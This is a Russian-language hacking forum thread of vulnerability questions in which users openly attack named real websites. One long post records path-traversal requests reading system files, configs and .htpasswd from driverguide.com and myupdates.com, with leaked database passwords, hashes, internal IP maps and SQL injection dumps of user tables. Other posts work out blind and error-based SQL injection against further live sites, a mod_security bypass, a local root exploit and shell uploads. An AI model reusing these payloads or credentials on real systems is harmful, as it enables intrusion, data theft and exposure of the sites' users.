Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. oko

    oko New Member

    Joined:
    1 May 2010
    Messages:
    28
    Likes Received:
    1
    Reputations:
    0
    Подскажите как можно использовать открытый прокси, ну т.е сканер выдал открыт порт 8080

    Это может позволить злоумышленнику обойти брандмауэр и подключить к чувствительным порты, такие как 23 (Telnet), 25 (Sendmail)

    ну вот что то такое... хотелось бы не много подробнее про это
     
  2. .Slip

    .Slip Elder - Старейшина

    Joined:
    16 Jan 2006
    Messages:
    1,571
    Likes Received:
    977
    Reputations:
    783
    Апельсин, телевизор, коробка, деревья, автомобиль. Можно поподробнее про это?
     
    1 person likes this.
  3. oko

    oko New Member

    Joined:
    1 May 2010
    Messages:
    28
    Likes Received:
    1
    Reputations:
    0
    что можно сделать если у сайта открыт порт 8080 ? сканер пишет критическая уязвимость, вот хочу понять почему и как ей пользоваться
     
  4. scorpic393

    scorpic393 Banned

    Joined:
    5 Feb 2010
    Messages:
    59
    Likes Received:
    4
    Reputations:
    3
    попал в админку через скулю типа 1 or 1 =1 --

    в админке нет возможности залить шелл, хотя была, но какието уроды, которые там уже побывали раз*бали всё. Но я нашол там локальный инклуд, но на серваке стоит mod_secury который фильтрует и в гете и посте данные типа /etc/passwd, Хотя /etc/hosts - прошол. помогите обойти плиз mod_securuty для локального инклуда плиз.
     
  5. shell_c0de

    shell_c0de Hack All World

    Joined:
    7 Jul 2009
    Messages:
    1,185
    Likes Received:
    618
    Reputations:
    690
    Параноикам )

    короче ситуация такая ...
    цель залить шелл на driverguide.com
    найденные баги etc...
    http://forums.driverguide.com/ форум Булка
    http://myupdates.com/static.php?typ...//../..//../..//etc/passwd&files=screen,style
    http://myupdates.com/static.php?type=css&files=../../../../../../../../etc/passwd
    что то etc/passwd разные показывает хотя файл тот же =\

    http://myupdates.com/static.php?type=css&files=../index.php
    http://myupdates.com/static.php?typ....com/members//icx/general/filesystem.inc.php
    http://myupdates.com/static.php?typ.../home/../../driverguide/home/aptimus.inc.php
    http://myupdates.com/static.php?type=css&files=../../../../../../../../etc/hosts
    http://myupdates.com/static.php?typ...cx/driverguide/home//support/support.inc.php
    http://myupdates.com/static.php?typ.../members/icx/driverguide/home/voyeur.inc.php
    http://myupdates.com/static.php?typ.../ums/driverguide_conf/aptimus_login.xinc.php
    http://myupdates.com/static.php?typ....com/members//icx/general/filesystem.inc.php
    http://myupdates.com/static.php?typ....com/members/icx/driverguide/home/robots.php
    http://myupdates.com/static.php?type=css&files=../../../../icx/ums/ums_instance.php
    http://myupdates.com/static.php?typ.../../../../../../../etc/httpd/conf/httpd.conf
    http://myupdates.com/static.php?typ..../../../../../../../var/log/httpd/access_log
    http://myupdates.com/static.php?type=css&files=../../../../../../../../etc/hosts
    Path: DocumentRoot /home/httpd/driverguide.com/beta/public
    дальше ....
    http://myupdates.com/static.php?typ...rguide.com/forums/public/includes/config.php
    данные БД но коннекта внешне нема =(
    Code:
    $config['Database']['dbtype'] = 'mysql';
    
    $config['Database']['dbname'] = 'vb3';
    
    $config['Database']['tableprefix'] = 'vb3_';
    
    $config['Database']['technicalemail'] = '';
    
    $config['Database']['force_sql_mode'] = false;
    
    
    $config['MasterServer']['servername'] = '192.168.1.194';
    $config['MasterServer']['port'] = 3306;
    
    $config['MasterServer']['username'] = 'betav2';
    $config['MasterServer']['password'] = 'betav2a';
    
    $config['MasterServer']['usepconnect'] = 0;
    
    
    $config['SlaveServer']['servername'] = '';
    $config['SlaveServer']['port'] = 3306;
    $config['SlaveServer']['username'] = '';
    $config['SlaveServer']['password'] = '';
    $config['SlaveServer']['usepconnect'] = 0;
    Версия Linux version 2.4.21-60.ELsmp ([email protected]) (gcc version 3.2.3 20030502 (Red Hat Linux 3.2.3-59)) #1
    Локалка/соседы
    192.168.1.244 web6.driverguide.com web6
    192.168.1.211 web1.driverguide.com web1
    192.168.1.212 web2.driverguide.com web2
    192.168.1.214 web3.driverguide.com web3
    192.168.1.215 web4.driverguide.com web4
    192.168.1.243 web5.driverguide.com web5
    127.0.0.1 members-images.driverguide.net
    192.168.1.219 eml.driverguide.com
    192.168.1.244 members.driverguide.com members
    192.168.1.244 forums.driverguide.com forums
    192.168.1.244 beta.driverguide.com beta
    192.168.1.244 list.driverguide.com list
    192.168.1.220 db1.driverguide.com db1
    192.168.1.219 email.driverguide.net email
    192.168.1.211 web1-internal.driverguide.net
    192.168.1.212 web2-internal.driverguide.net

    http://members.driverguide.com//internal/phpMyAdmin/
    пыхадмин =) phpMyAdmin 2.5.3 сплойт для этой ветке http://milw0rm.com/exploits/309 но хз пока не юзал
    http://myupdates.com/internal/admin/
    http://myupdates.com/static.php?type=css&files=../internal/admin/.htaccess%00
    editor:7vr1es1uwzlqI DES
    в Форуме 91к юзверов дамп ваше =)
    -added-
    http://myupdates.com/static.php?type=css&files=../../../../../../../../../../home/httpd/myupdates.com/www/bcx/myupdates/home/_htpasswd/.htpasswd%00
    editor:7vr1es1uwzlqI
    http://members.driverguide.com//internal/phpMyAdmin/
    Конфиг ПМА http://myupdates.com/static.php?type=css&files=../../../../../../../../../..//home/httpd/driverguide.com/members/icx/thirdparty/phpMyAdmin-2.5.3/config.inc.php%00

    Alias /internal/phpMyAdmin/ "/home/httpd/driverguide.com/members/icx/thirdparty/phpMyAdmin-2.5.3/
    путь с веба /internal/phpMyAdmin/ но млин
    $config['MasterServer']['username'] = 'betav2';
    $config['MasterServer']['password'] = 'betav2a';

    http://myupdates.com/internal/admin/
    вот еще http://myupdates.com/static.php?type=csshttp://myupdates.com/static.php?type=css&files=../../../../../../../../../..///home/httpd/driverguide.com/members/icx/thirdparty/FlashChat_v37/config.php%00
    Code:
    $database = "driverdb__live";	// MySQL database name
    $dbuser = "dev";	// MySQL username
    $dbpass = "dbd3v";	// MySQL password
    $host = "192.168.1.194";	 // MySQL host name
    moderatorPassword = "mod123";	// to login as a moderator
    $spyPassword = "spy123";	 // to login as a spy (disabled when using XOOPS)
    еще кое что откопал
    http://myupdates.com/static.php?typ...httpd/icentric.com/intranet/public/.htpasswd
    http://intranet.icentric.com/
    intranet:f68alIucmxrmU
    quincy:B7B2pTzqkrdbQ
    опять DES
    http://blog.driverguide.com/wp-login.php стоит ВП

    Попробовал через сессию но тут как бэ не совсем инклуд а читалка файлов получается, принклудит в лог апача нету резона=\
    что можете рекомендовать ? что то в 5 утра башка не варит дальше, хотя 98% данные в руках но ничего не выходит =\
    ===
    короче вот и скуля http://members.driverguide.com/index.php?companyid=-2712+union+select+user(),user_pass+from+driverguide_blog.wp_users+/*&action=getinfo
    Code:
    <title>[email protected] ($P$B1SdEpP2uJl/0yIR3M6TryHvTigpEC/) Drivers / Support / Contact Info</title>
    http://members.driverguide.com/index.php?companyid=-2712+union+select+username,password+from+user+limit+1,100000/*&action=getinfo
    <title>admin (a1e5555abefe434946e95f0de3fb2787) Drivers / Support / Contact Info</title>

    a1e5555abefe434946e95f0de3fb2787 : Shaaolin
    quincy:B7B2pTzqkrdbQ:p51s
    http://intranet.icentric.com/
    http://myupdates.com/internal/admin/
    http://members.driverguide.com/internal/phpMyAdmin/
    короче никуда не подошел или фильтр по айпи или хз =\
    есть идеи ?
    P.S Сорри за много букаф )
     
    _________________________
    1 person likes this.
  6. *uNkN0Wn*

    *uNkN0Wn* Member

    Joined:
    25 Mar 2009
    Messages:
    175
    Likes Received:
    92
    Reputations:
    11
    Есть XSS. Каким образом можно сделать iframe на всё окно?
     
  7. .:[melkiy]:.

    .:[melkiy]:. Elder - Старейшина

    Joined:
    25 Jan 2009
    Messages:
    355
    Likes Received:
    314
    Reputations:
    163
  8. *uNkN0Wn*

    *uNkN0Wn* Member

    Joined:
    25 Mar 2009
    Messages:
    175
    Likes Received:
    92
    Reputations:
    11
  9. pelligrim

    pelligrim Elder - Старейшина

    Joined:
    26 Apr 2008
    Messages:
    31
    Likes Received:
    20
    Reputations:
    0
    есть инъекция 4 ветка

    http://gay.ks.ua/links.php?catid=32+and+substring(version(),1,1)=4 :)))

    помогите правильно составить запрос, что бы вывод был в ошибке.
    или здесь только крутить как слепую?
     
  10. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    Херсонский гей-портал :D
     
    _________________________
  11. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    http://gay.ks.ua/links.php?catid=32+order+by+4--
    http://gay.ks.ua/links.php?catid=-32+union+select+1,2,3,4--

    колонки не видны

    ищи скул в другом скрипте

    вот еще инфа

    http://gay.ks.ua/links.php?catid=32+and+substring(user(),1,1)=char(103)
    http://gay.ks.ua/links.php?catid=32+and+substring(user(),2,1)=char(97)
    http://gay.ks.ua/links.php?catid=32+and+substring(user(),3,1)=char(121)
    http://gay.ks.ua/links.php?catid=32+and+substring(user(),4,1)=char(107)
    http://gay.ks.ua/links.php?catid=32+and+substring(user(),5,1)=char(115)


    юзер-gayks

    http://gay.ks.ua/links.php?catid=32+and+substring(@@version_compile_os,1,1)=char(112)
    http://gay.ks.ua/links.php?catid=32+and+substring(@@version_compile_os,2,1)=char(99)

    думаю ос pc-linux
     
    _________________________
    #12751 Konqi, 8 May 2010
    Last edited: 8 May 2010
  12. DrakonHaSh

    DrakonHaSh Elder - Старейшина

    Joined:
    16 Apr 2008
    Messages:
    118
    Likes Received:
    29
    Reputations:
    24
    http://gay.ks.ua/links.php?catid=32 order by 5
    =>
    Unknown column '5' in 'order clause'
    => по идее можно выводить данные через ошибку
     
  13. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    на пример
     
    _________________________
  14. DrakonHaSh

    DrakonHaSh Elder - Старейшина

    Joined:
    16 Apr 2008
    Messages:
    118
    Likes Received:
    29
    Reputations:
    24
    я про то, что вывод ошибки можно поймать
    а вот использовать методы из Вывод информации в ошибке для MySQL всех версий у меня не получилось. может у вас получится ;)

    http://gay.ks.ua/links.php?catid=32 UNION SELECT * FROM mysql.users
    =>
    SELECT command denied to user: 'gayks_admin@localhost' for table 'users'

    http://gay.ks.ua/links.php?catid=32 UNION SELECT * FROM users
    =>
    Table 'gayks_phorum.users' doesn't exist

    прогнал тулзой пашкелы подбор таблиц (без префикса), нашла только одну - video:
    http://gay.ks.ua/links.php?catid=32 UNION SELECT id FROM video
    =>
    The used SELECT statements have a different number of columns
     
    #12754 DrakonHaSh, 8 May 2010
    Last edited: 8 May 2010
    1 person likes this.
  15. S00pY

    S00pY Active Member

    Joined:
    24 Apr 2007
    Messages:
    91
    Likes Received:
    109
    Reputations:
    21
    gay.ks.ua/links.php?catid=32+and+substring(@@version,1,2)=4.0
     
  16. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    database() - gayks

    щас всем народом будем взломать гей портал
     
    _________________________
  17. DrakonHaSh

    DrakonHaSh Elder - Старейшина

    Joined:
    16 Apr 2008
    Messages:
    118
    Likes Received:
    29
    Reputations:
    24
    заметил у них на на форуме:
    Copyright BOY-UANIC 2002-2010
    сходил в гугл, нашел это:
    http://www.eu-football.info/_links.php?catid=10 and+substring(version(),1,1)=5
    т.е. тот же движ, но mysql - 5-ка, соответственно в ней скорее всего можно все, что надо, подсмотреть ;)

    балин, и тут облом :)
    http://www.eu-football.info/_links.php?catid=10 and+(select+1+from+(select+count(0),concat((select+version()),floor(rand(0)* 2))+from+information_schema.tables+group+by+2)a)--+
    =>
    SELECT command denied to user 'gbua_f00t'@'213.186.117.208' for table 'tables'

    а вот таблица video и здесь присутствует:
    http://www.eu-football.info/_links.php?catid=10 and+(select+1+from+(select+count(0),concat((select+version()),floor(rand(0)* 2))+from+video+group+by+2)a)--+
    =>
    Duplicate entry '5.0.45-community-nt-log1' for key 1
     
    #12757 DrakonHaSh, 8 May 2010
    Last edited: 8 May 2010
  18. daniel_1024

    daniel_1024 Elder - Старейшина

    Joined:
    15 Jul 2009
    Messages:
    260
    Likes Received:
    227
    Reputations:
    386
    всем доброго времени суток.
    вопрос - есть сервер Linux 2.6.10-1.771_FC2smp #1 SMP Mon Mar 28 01:10:51 EST 2005 i686
    скачал скомпилированный эксплойт Krad отсюда http://files.xakep.biz/Local_Root_Exploits/krad
    запускаю ./exploit
    получаю ошибку: [6658: 3] tcsetattr: Invalid argument
    эээ...что не так ?
     
  19. .:[melkiy]:.

    .:[melkiy]:. Elder - Старейшина

    Joined:
    25 Jan 2009
    Messages:
    355
    Likes Received:
    314
    Reputations:
    163
    http://milw0rm.com/sploits/2009-linux-sendpage3.tar.gz
    http://milw0rm.com/sploits/2009-linux-sendpage2.tar.gz
     
    1 person likes this.
  20. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    phpbb 2.0.22, есть админские права ..можно как нить залить шелл ??

    на эту версию ничего не нашел

    http://forum.antichat.ru/thread24488.html
     
    _________________________
Thread Status:
Not open for further replies.